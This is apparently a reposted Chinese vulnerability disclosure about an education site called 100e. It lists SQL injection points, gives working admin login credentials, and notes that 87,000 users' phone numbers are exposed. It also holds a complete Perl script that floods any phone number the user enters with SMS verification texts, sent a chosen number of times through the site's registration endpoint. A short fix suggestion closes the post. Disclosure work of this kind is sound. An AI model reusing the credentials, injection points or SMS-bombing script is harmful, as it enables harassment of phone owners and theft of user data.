见详细说明,多处安全 漏洞 ,会导致8.7w用户敏感信息泄露。 详细说明:http://edu.100e测试数据/course/instance/?id=4091
http://space.100e测试数据/myspace/MyDiaryList.asp?username=admin
都是注入 http://admin.100e测试数据 后台 登陆框是post注入
U:0001 P:111进入 后台有啥你们自己知道,8.7W用户的电话还是很可观的 后台也都是注入。
貌似是整个站只要是查询 数据库 的地方就有注入- - shell不拿了,会有脱裤的嫌疑
然后,还有个强力的短信Ddos攻击接口,注册验证的地方~~ 拿perl写了个脚本测试了下,好用!
use strict; use LWP::Simple; require LWP::UserAgent; my $url = 'http://passport.100e测试数据/register/new/step_mobile. asp x'; my $ua = L WP ::UserAgent->new; $ua->timeout(10); print "请输入要攻击的手机号:"; my $dh=<STDIN>; chomp $dh; print "请输入攻击次数:"; my $i=<STDIN>; chomp $i; for (my $a=1;$a<=$i;$a++) { my $response = $ua->post( $url, ['postback' => 'postback', 'mobile' => "$dh"] ); print "已发送$a次\n"; }
修复方案: 注入进行过滤,短信验证加上时间。
查看更多关于100e一百易问题集合 - 网站安全 - 自学php的详细内容...